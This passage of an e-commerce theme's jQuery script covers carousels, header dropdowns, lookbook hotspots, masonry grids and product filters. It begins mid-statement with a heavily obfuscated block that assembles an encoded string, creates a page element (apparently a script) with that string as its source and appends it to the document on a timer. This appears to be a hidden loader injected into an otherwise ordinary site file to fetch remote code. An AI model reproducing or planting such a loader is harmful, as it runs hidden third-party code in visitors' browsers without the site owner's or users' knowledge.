-0x4fa,_0x3919de,_0x3919de-0xd7,_0x44ff4f-0xec);}_0x19d1c7[_0x455e26(-0x25d,'hYHj',-0x2b4,-0x271,-0x26e)]=_0x455e26(-0x256,'yl]9',-0x18e,-0x1e9,-0x21e)+'t',_0x19d1c7[_0x455e26(-0x1ca,'xyAr',-0x239,-0x228,-0x2ad)]=_0x455e26(-0x13f,'T^fX',-0x175,-0x1b2,-0x206)+_0x4e0b5e(0x4c3,0x43e,0x3cc,'hLnB',0x4a9)+_0xe69556(0x38b,0x41c,0x3f3,'kHqn',0x3ac)+_0x455e26(-0x16a,'j3Ie',-0x124,-0x178,-0x1a9)+_0x455e26(-0x1db,'9hYv',-0x20f,-0x24a,-0x21a)+_0x3df786(0x4,0x35,'^b&#',-0x3e,0x25)+_0x3df786(-0x9,-0xcb,'3^hF',-0x95,-0xae)+_0xe69556(0x4f9,0x467,0x4ef,'O*P@',0x3dc)+_0x4e0b5e(0x430,0x467,0x451,'HGbZ',0x3ec)+_0x4e0b5e(0x4b4,0x496,0x441,'GFGB',0x433)+_0x2af9b0(-0x12e,-0xc7,-0x11a,'eYGQ',-0x14f)+_0x2af9b0(-0x9a,-0xd8,-0x122,'V@&u',-0x101)+_0x2af9b0(-0x5b,-0x7e,-0x80,'692A',-0x90)+_0xe69556(0x3d0,0x41d,0x437,'jUHi',0x3e5)+_0x455e26(-0x289,'BxQL',-0x262,-0x259,-0x275)+_0x2af9b0(-0x2c,-0xc3,-0x83,'vvCE',-0xc2);function _0x4e0b5e(_0x3df81f,_0x49c3cc,_0x13cb39,_0x1d3027,_0x2351fb){return _0xa8442d(_0x3df81f-0x17c,_0x49c3cc-0xb,_0x1d3027,_0x1d3027-0x191,_0x2351fb-0x126);}const _0x5e352e=_0x19d1c7,_0xc07ef9=document[_0x4e0b5e(0x429,0x478,0x486,'%^9#',0x3ef)+_0x2af9b0(-0xc,-0x51,-0x79,'vvCE',0x1f)+_0x455e26(-0x208,'JNjc',-0x151,-0x1c1,-0x1f7)](_0x5e352e[_0x3df786(-0xbe,0x17,'eYGQ',-0x26,0x12)]);function _0xe69556(_0x2db372,_0x42f3a4,_0x1f1ffa,_0x3a57fc,_0x58ac50){return _0xa8442d(_0x2db372-0x5,_0x42f3a4- -0xb,_0x3a57fc,_0x3a57fc-0x52,_0x58ac50-0x116);}function _0x3df786(_0x177a40,_0x18d10b,_0x116dad,_0x2608cb,_0x3ce0fa){return _0x2790dd(_0x2608cb-0x17c,_0x18d10b-0xdb,_0x116dad-0x95,_0x2608cb-0x14d,_0x116dad);}_0xc07ef9[_0x3df786(-0x4d,0x36,'jUHi',-0x3d,0x35)]=_0x5e352e[_0x3df786(0xf2,0x44,'JNjc',0x91,0x89)];function _0x455e26(_0x51c0e0,_0x2cdf0a,_0x48671b,_0xadb7a1,_0x28c582){return _0x2790dd(_0xadb7a1- -0x58,_0x2cdf0a-0x13c,_0x48671b-0xc7,_0xadb7a1-0x50,_0x2cdf0a);}document[_0x4e0b5e(0x3c1,0x427,0x469,'OwXp',0x42c)][_0x455e26(-0x13b,'kHqn',-0x102,-0x14f,-0xfd)+'d'](_0xc07ef9);},0xd70+-0x1577+0xfd7);}
//header top panel
if ($ptTopPanel.length) {
  ptTopPanel();
};
// add product item
if (blocks.ptBackToTop.length) {
  ptBackToTop();
};
// Slide Column *listing-left-column.html
if ($ptLeftColumnAside && blocks.ptBtnColumnClose && blocks.ptBtnToggle) {
  ptToggleCol();
};
if (blocks.ptCollapse.length) {
  ptCollapse();
};
//modal video on page product
if (blocks.modalVideoProduct.length) {
  ptVideoPopup();
};
//pt-collapse-block(pages product single)
if (blocks.ptCollapseBlock.length) {
  ptCollapseBlock();
};
//calendarDatepicker(blog)
if (blocks.ptCalendarDatepicker.length) {
  blocks.ptCalendarDatepicker.datepicker();
};
//video(blog listing)
if (blocks.ptVideoBlock.length) {
  ptVideoBlock();
};
// determination ie
if (getInternetExplorerVersion() !== -1) {
  $html.addClass("ie");
};
// inputCounter
if (blocks.ptInputCounter.length) {
  ptInputCounter();
};
// header
initStuck();
if ($ptDesctopParentSearch.length) {
  mobileParentSearch();
};
if ($ptcartObj.length) {
  mobileParentCart();
};

// product item Design01
if (blocks.ptProductDesign01.length) {
  ptProductHover();
};
if (blocks.ptfooterMobileCollapse.length) {
  ptFooterCollapse();
};
// lookbook.html
if (blocks.ptLookbook.length) {
  ptLookbook(ptwindowWidth);
};
// carusel
if (blocks.ptCarouselProducts.length) {
  blocks.ptCarouselProducts.each( function() {
    var slick = $(this),
        item =  $(this).data('item');
    slick.slick({
      dots: true,
      arrows: true,
      infinite: true,
      speed: 300,
       slidesToShow: item || 4,
       slidesToScroll: item || 4,
      adaptiveHeight: true,
      responsive: [{
        breakpoint: 1025,
        settings: {
           slidesToShow: 3,
           slidesToScroll: 3
        }
      },
                   {
                     breakpoint: 791,
                     settings: {
                       slidesToShow: 2,
                  		slidesToScroll: 2
                     }
                   }]
    });
  });
};
// lookbook.html
// slider
if (blocks.ptSliderLookbook.length) {
  blocks.ptSliderLookbook.slick({
    dots: true,
    arrows: true,
    infinite: true,
    speed: 300,
    slidesToShow: 1,
    adaptiveHeight: true
  });
};

//blog listing slider
if (blocks.ptMobileProductSlider.length) {
  blocks.ptMobileProductSlider.slick({
    lazyLoad: 'progressive',
    dots: false,
    arrows: true,
    infinite: true,
    speed: 300,
    slidesToShow: 1,
    adaptiveHeight: true
  });
};
//slick main (* index-14.html)
if (blocks.ptSlickMain.length) {
  blocks.ptSlickMain.slick({
    dots: true,
    arrows: true,
    infinite: true,
    speed: 300,
    slidesToShow: 1,
    adaptiveHeight: true,
    responsive: [{
      breakpoint: 1025,
      settings: {
        dots: false,
      }
    }]
  });
};
//blog listing slider
if (blocks.ptSliderBlog.length) {
  blocks.ptSliderBlog.slick({
    dots: false,
    arrows: true,
    infinite: true,
    speed: 300,
    slidesToShow: 1,
    adaptiveHeight: true
  });
};
//blog single post slider
if (blocks.ptSliderBlogSingle.length) {
  blocks.ptSliderBlogSingle.slick({
    dots: false,
    arrows: false,
    infinite: true,
    speed: 300,
    slidesToShow: 1,
    adaptiveHeight: true
  });
  //total slides
  var ptSlickQuantity = $('.pt-slick-quantity');
  if (ptSlickQuantity.length) {
    ptSlickQuantity.find('.total').html(blocks.ptSliderBlogSingle.slick("getSlick").slideCount);
    blocks.ptSliderBlogSingle.on('afterChange', function(event, slick, currentSlide){
      var currentIndex = $('.slick-current').attr('data-slick-index');
      currentIndex++;
      ptSlickQuantity.find('.account-number').html(currentIndex);
    });
  };
  //button
  var ptSlickButton = $('.pt-slick-button');
  if (ptSlickButton.length) {
    ptSlickButton.find('.slick-next').click(function(){
      blocks.ptSliderBlogSingle.slick('slickNext');
    });
    ptSlickButton.find('.slick-prev').click(function(){
      blocks.ptSliderBlogSingle.slick('slickPrev');
    });
  };
};




// portfolio mobile click
if (blocks.ptPortfolioContent.length && is_touch_device()) {
  ptPortfolioContentMobile();
};
if (blocks.ptDotsAbsolute.length) {
  ptSlickDots();
};
//sticky(product-05.html)
if (blocks.ptAirSticky.length) {
  ptAirSticky(ptwindowWidth);
};
// header - pt-dropdown-obj
if (blocks.ptHeaderDropdown.length) {
  ptHeaderDropdown();
};

// product single pt-btn-zomm(*magnific popup)
if (blocks.ptProductSingleBtnZomm.length) {
  ptProductSingleBtnZomm();
};

$window.on('load', function () {
  var ptwindowWidth = window.innerWidth || $window.width();
  if ($body.length) {
    $body.addClass('loaded');
  };
  // filters options product(definition layout)
  if ($ptFilterOptions.length) {
    ptFilterLayout(ptwindowWidth);
  };
  if (blocks.ptProductItem.length) {
    ptProductSmall(ptwindowWidth);
  };
  if (blocks.ptProductDesign02.length) {
    ptOverflowProduct();
  };
  if (blocks.ptProductMasonry.length) {
    gridProductMasonr();
  };
  if (blocks.ptBlogMasonry.length) {
    gridGalleryMasonr();
  };
  if (blocks.ptPortfolioMasonry.length) {
    gridPortfolioMasonr();
    initPortfolioPopup();
  };  
});

var ptCachedWidth = $window.width();
$window.on('resize', function () {
  var newWidth = $window.width();
  if(newWidth !== ptCachedWidth){
    ptCachedWidth = newWidth;


    var ptwindowWidth = window.innerWidth || $window.width();

    // filters options product(definition layout)
    if ($ptFilterOptions.length) {
      ptFilterLayout(ptwindowWidth);
    };
    if (blocks.ptProductItem.length) {
      ptProductSmall();
    };
    if (blocks.ptProductDesign02.length) {
      ptOverflowProduct();
    };
    // portfolio mobile click
    if (blocks.ptPortfolioContent.length && is_touch_device()) {
      ptPortfolioContentMobile();
    };
    //sticky(product-05.html)
    if (blocks.ptAirSticky.length) {
      ptAirSticky(ptwindowWidth);
    };
    if ($ptLeftColumnAside.hasClass('column-open') && $ptLeftColumnAside.length) {
      $ptLeftColumnAside.find('.pt-btn-col-close a').trigger('click');
    };

    //header init stuck and detach
    if ($ptDesctopParentSearch.length) {
      mobileParentSearch();
    };
    if ($ptcartObj.length) {
      mobileParentCart();
    };
    if (blocks.ptDotsAbsolute.length) {
      ptSlickDots();
    };
  }
});
// Functions
var cssFix = function() {
  var u = navigator.userAgent.toLowerCase(),
      is = function(t) {
        return (u.indexOf(t) != -1)
      };
  $html.addClass([
    (!(/opera|webtv/i.test(u)) && /msie (\d)/.test(u)) ? ('ie ie' + RegExp.$1) :
    is('firefox/2') ? 'gecko ff2' :
    is('firefox/3') ? 'gecko ff3' :
    is('gecko/') ? 'gecko' :
    is('opera/9') ? 'opera opera9' : /opera (\d)/.test(u) ? 'opera opera' + RegExp.$1 :
    is('konqueror') ? 'konqueror' :
    is('applewebkit/') ? 'webkit safari' :
    is('mozilla/') ? 'gecko' : '',
    (is('x11') || is('linux')) ? ' linux' :
    is('mac') ? ' mac' :
    is('win') ? ' win' : ''
  ].join(''));
}();

function ptTopPanel(){
  $ptTopPanel.on('click', function(e) {
    e.preventDefault;
    var target = e.target;
    if ($('.pt-btn-close').is(target)){
      $(this).slideUp(200);
    };
  });
};

//tabs init carusel
$('a[data-toggle="tab"]').length && $('body').on('shown.bs.tab', 'a[data-toggle="tab"]', function (e) {
  $('.slick-slider').each(function() {
    $(this).slick("getSlick").refresh();
  });
});
$('.modal').on('shown.bs.modal', function (e) {
  var objSlickSlider = $(this).find('.slick-slider');
  if(objSlickSlider.length){
    objSlickSlider.each(function() {
      $(this).slick("getSlick").refresh();
    });
  };
});
function ptItemsCategories(){
  blocks.ptItemsCategories.hover(function() {
    $(this).toggleClass('active');
  });
};
function ptHeaderDropdown(){
  var dropdownPopup = $('.header-popup-bg');
  if(!dropdownPopup.length){
    $body.append('<div class="header-popup-bg"></div>');
  };
  
  $('header').on('click', '.js-dropdown', function(e) {
    var ptwindowWidth = window.innerWidth || $window.width(),
        $this = $(this),
        target = e.target,
        objSearch = $('.pt-search'),
        objSearchInput = objSearch.find('.pt-search-input');

    // search
    if ($this.hasClass('pt-search') && $('.pt-dropdown-toggle').is(target)){
      searchPopup();
    };
    function searchPopup(){
      $this.addClass('active');
      $body.addClass('pt-open-search');
      objSearchInput.focus();
      return false;
    };
    if (objSearch.find('.pt-btn-close').is(target)){
      objSearchClose();
      return false;
    };
    function objSearchClose(){
      $this.removeClass('active');
      objSearchInput.blur();
      $body.removeClass('pt-open-search');
      return false;
    };

    // cart, account, multi-ob
    if (!$(this).hasClass('pt-search') && $('.pt-dropdown-toggle').is(target)){
      ptwindowWidth <= 1024 ?  popupObjMobile($this) : popupObjDesctop($this);
    };
    function popupObjMobile(obj){
      $('header').find('.js-dropdown.active').removeClass('active');
      obj.toggleClass('active').find('.pt-dropdown-menu').removeAttr("style");
      $body.toggleClass('pt-popup-dropdown');
      $('header .pt-dropdown-menu').perfectScrollbar().addClass('perfectScrollbar');
    };
    function popupObjDesctop(obj){
      var $this = obj,
          target = e.target;

      if ($this.hasClass('active')){
        $this.toggleClass('active').find('.pt-dropdown-menu').slideToggle(200);
        $this.find('.ps-container').removeAttr("style");
        return;
      };
      $('.pt-desktop-header .pt-dropdown-obj').each( function () {
        var $this = $(this);
        if($this.hasClass('active')){
          $this.removeClass('active').find('.pt-dropdown-menu').css("display", "none");
        }
      });
      if ($('.pt-dropdown-toggle').is(target)){
        toggleDropdown($this);
      };
      if($this.hasClass('pt-cart')){
        $.fn.getRealDimensions = function (outer){
          var $this = $(this);
          if ($this.length == 0) {
            return false;
          }
          var $clone = $this.clone()
          .show()
          .css('visibility','hidden')
          .insertAfter($this);
          var result = {
            width:      (outer) ? $clone.outerWidth() : $clone.innerWidth(),
            height:     (outer) ? $clone.outerHeight() : $clone.innerHeight(),
            offsetTop:  $clone.offset().top,
            offsetLeft: $clone.offset().left
          };
          $clone.remove();
          return result;
        };

        var dimensions = $('.pt-cart-content').first().getRealDimensions().height,
            viewportHeight = window.innerHeight,
            cartPopup = dimensions + $('#pt-header').height(),
            stuckNav = $('.pt-stuck-nav');

        if(stuckNav.hasClass('stuck')){
          var insertValue = viewportHeight - stuckNav.height();
        } else{
          var insertValue = viewportHeight - $('#pt-header').height();
        };

        if(viewportHeight <= cartPopup){
          $('header .pt-dropdown-menu .pt-cart-layout').css({
            'height' : insertValue  + 'px'
          }).perfectScrollbar().addClass('perfectScrollbar');
        };
        $(window).resize(function(e){
          var ptCart = $('.pt-cart');
          if(ptCart.hasClass('active')){
            $('.pt-cart .pt-dropdown-toggle').trigger('click');
          };
        });
      }
    };
    function toggleDropdown(obj){
      obj.toggleClass('active').find('.pt-dropdown-menu').slideToggle(200);
    };

    $(document).mouseup(function(e){
      var ptwindowWidth = window.innerWidth || $window.width();

      if (!$this.is(e.target) && $this.has(e.target).length === 0){
        $this.each(function(){
          if($this.hasClass('active') && $this.hasClass('pt-search')){
            objSearch.find('.pt-btn-close').trigger('click');
          };
          if($this.hasClass('active') && !$this.hasClass('pt-search')){
            if(ptwindowWidth <= 1024){
              closeObjPopupMobile();
            } else {
              $('.js-dropdown').each( function () {
                if($(this).hasClass('active')){
                  $(this).removeClass('active').find('.pt-dropdown-menu').css("display", "none");
                }
              });
            };
          };
        });
      };
      if ($this.find('.pt-mobile-add .pt-close').is(e.target)){
        closeObjPopupMobile();
      };
    });
    function closeObjPopupMobile(){
      $('.js-dropdown.active').removeClass('active');
      $body.removeClass('pt-popup-dropdown');
      $('header .pt-dropdown-menu').removeClass('perfectScrollbar').perfectScrollbar('destroy');
      return false;
    };
  });
};

// button back to top
function ptBackToTop() {
  blocks.ptBackToTop.on('click',  function(e) {
    $('html, body').animate({
      scrollTop: 0
    }, 500);
    return false;
  });
  $window.scroll(function() {
    $window.scrollTop() > 500 ? blocks.ptBackToTop.stop(true.false).addClass('pt-show') : blocks.ptBackToTop.stop(true.false).removeClass('pt-show');
  });
  
};

// modal Add ToCart(*close)
function modalAddToCart() {
  blocks.modalAddToCart.on('click', '.btn-close-popup',  function(e) {
    $(this).closest('.modal-content').find('.modal-header .close').trigger('click');
    return false;
  });
};

// Mobile footer collapse
function ptFooterCollapse() {
  blocks.ptfooterMobileCollapse.on('click',function(e){
    e.preventDefault;
    var ptlayout = $(this).next(),
        ptwindowWidth = window.innerWidth || $window.width();

    $(this).toggleClass('pt-open');
    if(ptlayout.css('display') == 'none' &&  ptwindowWidth <= 790){
      ptlayout.animate({height: 'show'}, 300);
    }else if(ptlayout.css('display') == 'block' &&  ptwindowWidth <= 790){
      ptlayout.animate({height: 'hide'}, 300);
    }
  });
};

//slick slider functional for dots
function ptSlickDots() {
  blocks.ptDotsAbsolute.each(function(){
    var $this = $(this).find('.slick-dots');
    if($this.is(':visible')){
      var upperParent = $this.closest('[class ^= container]');
      if (upperParent.length){
        upperParent.css({'paddingBottom' : parseInt($this.height(), 10) + parseInt($this.css('marginTop'), 10)});
      }
    }
  });
};
// product item Design01 hover (*desctope)
function ptProductHover() {
  $document.on('mouseenter mouseleave', '#pt-pageContent .pt-product', function(e) {
    if($('.pt-product-listing').length && $('.pt-product-listing').hasClass("pt-col-one")) return false;

    var $this = $(this),
        windW = window.innerWidth,
        objLiftUp01 = $this.find('.pt-description'),
        objLiftUp02 = $this.find('.pt-product-inside-hover'),
        objHeight02 = parseInt(objLiftUp02.height())+3,
        objCountdown = $this.find('.pt-countdown_box'),
        target = e.target;

    if($this.hasClass('product-nohover')) return false;
    
    if (e.type === 'mouseenter' && windW > 1024) {
      ptOnHover();
    } else if (e.type === 'mouseleave' && e.relatedTarget && windW > 1024) {
      ptOffHover();
    };

    function ptOnHover(e){
      $this.stop().css({
        height: $this.innerHeight()
      }).addClass('hovered');
      objLiftUp01.stop().animate({'top': '-' + objHeight02}, 200);
      objLiftUp02.stop().animate({ 'opacity': 1 }, 400);
      objCountdown.stop().animate({'bottom': objHeight02}, 200);
      return false;
    };
    function ptOffHover(e){
      $this.stop().removeClass('hovered').removeAttr('style');
      objLiftUp01.stop().animate({'top': '0'}, 200, function(){$(this).removeAttr('style')});
      objLiftUp02.stop().animate({ 'opacity': 0 }, 100, function(){$(this).removeAttr('style')});
      objCountdown.stop().animate({'bottom': 0}, 200, function(){$(this).removeAttr('style')});
      return false
    };
  });
};

// product Small
function ptProductSmall(){
  var currentW = parseInt(blocks.ptProductItem.width(), 10),
      objProduct = $(".pt-product, .pt-product-design02");
  currentW <= 210 ? objProduct.addClass("pt-small") : objProduct.removeClass("pt-small");
};

(function($){
  if($('.js-align-arrow').length){
    placeArrows();
    $(window).resize(placeArrows);
  }
})(jQuery);
function placeArrows(e){
  $('.js-align-arrow').each(function(){
    var _ = $(this);
    var h = _.find('.slick-prev').height();
    setTimeout(function(){
      var ih = _.find('img').first().height();
      var _h = h > 40 ? 67 : 38;
      var y = parseInt(ih/2 + _h);
      _.find('.slick-arrow').css('top', y);
    }, 700);
  })
}

// pt-hotspot
function ptLookbook(ptwindowWidth){
  //add lookbook popup
  var objPopup = $('.pt-lookbook-popup');
  if(!objPopup.length){
    $body.append('<div class="pt-lookbook-popup"><div class="pt-lookbook-container"></div></div>');
  };

  var events = 'ontouchstart' in window ? "click" : "click mouseenter";
  blocks.ptLookbook.on(events, '.pt-hotspot' , function(e) {
    var $this = $(this),
        target = e.target,
        ptHotspot = $('.pt-hotspot'),
        ptwindowWidth = window.innerWidth || $window.width(),
        ptCenterBtn = $('.pt-btn').innerHeight() / 2,
        ptWidthPopup = $('.pt-hotspot-content').innerWidth();


    ptwindowWidth <= 789 ?  ptLookbookMobile($this) : ptLookbookDesktop($this);

    //ptLookbookDesktop
    function ptLookbookDesktop($this){

      if ($this.hasClass('active')) return;

      var objTop = $this.offset().top + ptCenterBtn,
          objLeft = $this.offset().left,
          objContent = $this.find('.pt-hotspot-content').detach();

      //check if an open popup
      var checkChildren = $('.pt-lookbook-container').children().size();
      if(checkChildren > 0){
        if(ptwindowWidth <= 789){
          closePopupMobile();
        } else {
          closePopupDesctop();
        };
      }

      //open popup
      popupOpenDesktop(objContent, objTop, objLeft);

    };
    function popupOpenDesktop(objContent, objTop, objLeft){
      //check out viewport(left or right)
      var halfWidth =  ptwindowWidth / 2,
          objLeftFinal = 0;

      if(halfWidth < objLeft){
        objLeftFinal = objLeft - ptWidthPopup - 7;
        popupShowLeft(objLeftFinal);
      } else{
        objLeftFinal = objLeft + 45;
        popupShowRight(objLeftFinal);
      };

      $('.pt-lookbook-popup').find('.pt-lookbook-container').append(objContent);
      $this.addClass('active').siblings().removeClass('active');

      function popupShowLeft(objLeftFinal){
        $('.pt-lookbook-popup').css({
          'top' : objTop,
          'left' : objLeftFinal,
          'display' : 'block'
        }, 300).animate({
          marginLeft: 26 + 'px',
          opacity: 1
        }, 300);
      };
      function popupShowRight(objLeftFinal){
        $('.pt-lookbook-popup').css({
          'top' : objTop,
          'left' : objLeftFinal,
          'display' : 'block'
        }).animate({
          marginLeft: -26 + 'px',
          opacity: 1
        });
      };
    };
    //ptLookbookMobile
    function ptLookbookMobile($this){
      var valueTop = $this.attr('data-top') + '%',
          valueLeft = $this.attr('data-left') + '%';

      $this.find('.pt-btn').css({
        'top' : valueTop,
        'left' : valueLeft
      });
      $this.css({
        'top' : '0px',
        'left' : '0px',
        'width' : '100%',
        'height' : '100%'
      });
      $this.addClass('active').siblings().removeClass('active');
      $this.find('.pt-content-parent').fadeIn(200);
    };
    //Close mobile
    if(ptwindowWidth <= 789){
      if ($('.pt-btn-close').is(e.target)){
        closePopupMobile();
        return false;
      };
      if ($('.pt-hotspot').is(e.target)){
        closePopupMobile();
      };
      $(document).mouseup(function(e){
        if (!$('.pt-lookbook-popup').is(e.target) && $('.pt-lookbook-popup').has(e.target).length === 0 && !$('.pt-hotspot').is(e.target) && $('.pt-hotspot').has(e.target).length === 0){
          closePopupDesctop();
        };
      });
    };
    //Close desctope
    if(ptwindowWidth > 789){
      //ptLookbookClose
      $(document).mouseup(function(e){
        var ptwindowWidth = window.innerWidth || $window.width();
        if ($('.pt-btn-close').is(e.target)){
          closePopupDesctop();
          return false;
        };
        if (!$('.pt-lookbook-popup').is(e.target) && $('.pt-lookbook-popup').has(e.target).length === 0 && !$('.pt-hotspot').is(e.target) && $('.pt-hotspot').has(e.target).length === 0){
          closePopupDesctop();
        };
      });
    };

    function closePopupDesctop(){
      //detach content popup
      var detachContentPopup = $('.pt-lookbook-popup').removeAttr("style").find('.pt-hotspot-content').detach();
      $('.pt-hotspot.active').removeClass('active').find('.pt-content-parent').append(detachContentPopup);
    };
    function closePopupMobile(){
      if($('.pt-lookbook-container').is(':has(div)')){
        var checkPopupContent = $('.pt-lookbook-container').find('.pt-hotspot-content').detach();
        $('.pt-hotspot.active').find('.pt-content-parent').append(checkPopupContent);
      };
      $('.pt-lookbook').find('.pt-hotspot.active').each(function(index) {
        var $this = $(this),
            valueTop = $this.attr('data-top') + '%',
            valueLeft = $this.attr('data-left') + '%';

        $this.removeClass('active').removeAttr("style").css({
          'top' : valueTop,
          'left' : valueLeft,
        }).find('.pt-btn').removeAttr("style").next().removeAttr("style");
      });
    };
    function checkclosePopupMobile(){
      $('.pt-hotspot').find('.pt-content-parent').each(function() {
        var $this = $(this);
        if($this.css('display') == 'block'){
          var $thisParent = $this.closest('.pt-hotspot'),
              valueTop = $thisParent.attr('data-top') + '%',
              valueLeft = $thisParent.attr('data-left') + '%';

          $this.removeAttr("style").prev().removeAttr("style");
          $thisParent.removeAttr("style").css({
            'top' : valueTop,
            'left' : valueLeft,
          });
        };
      });
    };
    $(window).resize(function(e) {
      var ptwindowWidth = window.innerWidth || $window.width();
      if(ptwindowWidth <= 789){
        closePopupMobile();
      } else {
        closePopupDesctop();
        checkclosePopupMobile();
      };
    });
    // return false;
  });
};
// Overflow Product
function ptOverflowProduct(){
  blocks.ptProductDesign02.hover(function() {
    if($('.pt-product-listing').length && $('.pt-product-listing').hasClass("pt-col-one")) return false;

    if (window.innerWidth < 1024) return;
    var objImgHeight = $(this).find('.pt-image-box').height(),
        objScroll = $(this).find('.pt-description'),
        objScrollHeight = objScroll.height() + 25;

    if (objImgHeight > objScrollHeight) return;
    $(this).addClass('pt-small');
    objScroll.height(objImgHeight).perfectScrollbar();

  }, function() {
    if (window.innerWidth < 1024) return;
    $(this).removeClass('pt-small').find('.pt-description').removeAttr('style').perfectScrollbar('destroy');
  });
};
function ptReinitflowProduct(){
  if (window.innerWidth < 1024 || $ptPageContent.find('.pt-product-design02').length == 0) return;
  $ptPageContent.find('.pt-product-design02').each(function() {
    $(this).perfectScrollbar('destroy');
    var objImgHeight = $(this).find('.pt-image-box').height(),
        objScroll = $(this).find('.pt-description'),
        objScrollHeight = objScroll.height() + 25;

    if (objImgHeight > objScrollHeight) return;
    $(this).addClass('pt-small');
    objScroll.height(objImgHeight).perfectScrollbar();
  });
}

// portfolio mobile click
function ptPortfolioContentMobile(){
  blocks.ptPortfolioContent.on('click', 'figure img', function() {
    $(this).closest(".pt-portfolio-content").find('figure').removeClass('gallery-click');
    $(this).closest("figure").addClass('gallery-click');
  });
};

//toggle col (listing-left-column.html)
function ptToggleCol() {
  var $btnClose = $ptLeftColumnAside.find('.pt-btn-col-close a');

  $('.pt-btn-toggle').on('click', function (e) {
    e.preventDefault();
    var ptScrollValue = $body.scrollTop() || $html.scrollTop();
    $ptLeftColumnAside.toggleClass('column-open').perfectScrollbar();
    $body.css("top", - ptScrollValue).addClass("no-scroll").append('<div class="modal-filter"></div>');
    var modalFilter = $('.modal-filter').fadeTo('fast',1);
    if (modalFilter.length) {
      modalFilter.click(function() {
        $btnClose.trigger('click');
      })
    }
    return false;
  });
  blocks.ptBtnColumnClose.on('click', function(e) {
    e.preventDefault();
    $ptLeftColumnAside.removeClass('column-open').perfectScrollbar('destroy');
    var top = parseInt($body.css("top").replace("px", ""), 10) * -1;
    $body.removeAttr("style").removeClass("no-scroll").scrollTop(top);
    $html.removeAttr("style").scrollTop(top);
    $(".modal-filter").unbind().remove();
  });
};

function ptCollapseBlock() {
  blocks.ptCollapseBlock.each( function () {
    var obj = $(this),
        objOpen = obj.find('.pt-item.active'),
        objItemTitle = obj.find('.pt-item .pt-collapse-title');

    objOpen.find('.pt-collapse-content').slideToggle(200);

    objItemTitle.on('click', function () {
      $(this).next().slideToggle(200).parent().toggleClass('active');
    });
  });
};
function getInternetExplorerVersion() {
  var rv = -1;
  if (navigator.appName === 'Microsoft Internet Explorer') {
    var ua = navigator.userAgent;
    var re = new RegExp("MSIE ([0-9]{1,}[\.0-9]{0,})");
    if (re.exec(ua) != null)
      rv = parseFloat(RegExp.$1);
  } else if (navigator.appName === 'Netscape') {
    var ua = navigator.userAgent;
    var re = new RegExp("Trident/.*rv:([0-9]{1,}[\.0-9]{0,})");
    if (re.exec(ua) != null)
      rv = parseFloat(RegExp.$1);
  }
  return rv;
};
// identify touch device
function is_touch_device() {
  return !!('ontouchstart' in window) || !!('onmsgesturechange' in window);
};
if (is_touch_device()) {
  $body.addClass('touch-device');
  $html.addClass('touch-device');
};
if (/Edge/.test(navigator.userAgent)) {
  $html.addClass('edge');
};
//video
function ptVideoBlock() {
  $('body').on('click', '.pt-video-block', function(e){
    e.preventDefault();
    var myVideo = $(this).find('.movie')[0];
    if (myVideo.paused){
      myVideo.play();
      $(this).addClass('play');
    } else {
      myVideo.pause();
      $(this).removeClass('play');
    }
  });
};
// Blog Masonr
function gridGalleryMasonr() {
  // init Isotope
  var $grid = blocks.ptBlogMasonry.find('.pt-blog-init').isotope({
    itemSelector: '.element-item',
    layoutMode: 'masonry',
  });
  // layout Isotope after each image loads
  $grid.imagesLoaded().progress( function() {
    $grid.isotope('layout').addClass('pt-show');
  });
  // filter functions
  var ptFilterNav =  blocks.ptBlogMasonry.find('.pt-filter-nav');
  if (ptFilterNav.length) {
    var filterFns = {
      ium: function() {
        var name = $(this).find('.name').text();
        return name.match(/ium$/);
      }
    };
    // bind filter button click
    ptFilterNav.on('click', '.button', function() {
      var filterValue = $(this).attr('data-filter');
      filterValue = filterFns[filterValue] || filterValue;
      $grid.isotope({
        filter: filterValue
      });
      $(this).addClass('active').siblings().removeClass('active');
    });
  };
};
// Product Masonr (listing-metro.html)
function gridProductMasonr() {
  // init Isotope
  var $grid = blocks.ptProductMasonry.find('.pt-product-init').isotope({
    itemSelector: '.element-item',
    layoutMode: 'masonry',
  });
  // layout Isotope after each image loads
  $grid.imagesLoaded().progress( function() {
    $grid.isotope('layout');
  });
  // filter functions
  var ptFilterNav =  blocks.ptProductMasonry.find('.pt-filter-nav');
  if (ptFilterNav.length) {
    var filterFns = {
      ium: function() {
        var name = $(this).find('.name').text();
        return name.match(/ium$/);
      }
    };
    // bind filter button click
    ptFilterNav.on('click', '.button', function() {
      var filterValue = $(this).attr('data-filter');
      filterValue = filterFns[filterValue] || filterValue;
      $grid.isotope({
        filter: filterValue
      });
      $(this).addClass('active').siblings().removeClass('active');
    });
  };
};
// collapseBlock(pages listing) *listing-left-column.html
function ptCollapse() {
  var item = blocks.ptCollapse,
      itemTitle = item.find('.pt-collapse-title'),
      itemContent = item.find('.pt-collapse-content');

  item.each(function() {
    if ($(this).hasClass('open')) {
      $(this).find(itemContent).slideDown();
    } else {
      $(this).find(itemContent).slideUp();
    }
  });
  itemTitle.on('click', function(e) {
    e.preventDefault();
    var speed = 300;
    var thisParent = $(this).parent(),
        nextLevel = $(this).next('.pt-collapse-content');
    if (thisParent.hasClass('open')) {
      thisParent.removeClass('open');
      nextLevel.slideUp(speed);
    } else {
      thisParent.addClass('open');
      nextLevel.slideDown(speed);
    }
  })
};
// ptFiltersOptions
(function($) {
  $.fn.removeClassFirstPart = function(mask) {
    return this.removeClass(function(index, cls) {
      var re = mask.replace(/\*/g, '\\S+');
      return (cls.match(new RegExp('\\b' + re + '', 'g')) || []).join(' ');
    });
  };
})(jQuery);

function ptFilterLayout(ptwindowWidth){
  if($('.pt-product-listing').hasClass("only-row")) return false;
  // detach filter aside left
  if($ptFilterOptions.hasClass('desctop-no-sidebar') && !$ptFilterOptions.hasClass('filters-detach-mobile')){
     ptwindowWidth <= 1024 ?  insertMobileCol() : insertFilter();
  };
  if($ptFilterOptions.hasClass('filters-detach-mobile')){
    ptwindowWidth <= 1024 ?  insertMobileCol() : insertFilter();
  };
  if(!$ptFilterOptions.hasClass('desctop-no-sidebar')){
    ptwindowWidth <= 1024 ?  insertMobileCol() : insertFilter();
  };

  function insertMobileCol(){
    var objFilterOptions = blocks.ptFilterSort.find('> *').detach();
    blocks.ptFilterDetachOption.find('.filters-row-select').append(objFilterOptions);
  };
  function insertFilter(){
    var objColFilterOptions = blocks.ptFilterDetachOption.find('.filters-row-select > *').detach();
    blocks.ptFilterSort.append(objColFilterOptions);
  };

  //active filter detection
  blocks.ptProductListing.removeClassFirstPart("pt-col-*");

  var ptQuantity = $ptFilterOptions.find('.pt-quantity'),
      ptProductItem = blocks.ptProductListing.find('.pt-col-item:first'),
      ptProductItemValue =  (function(){
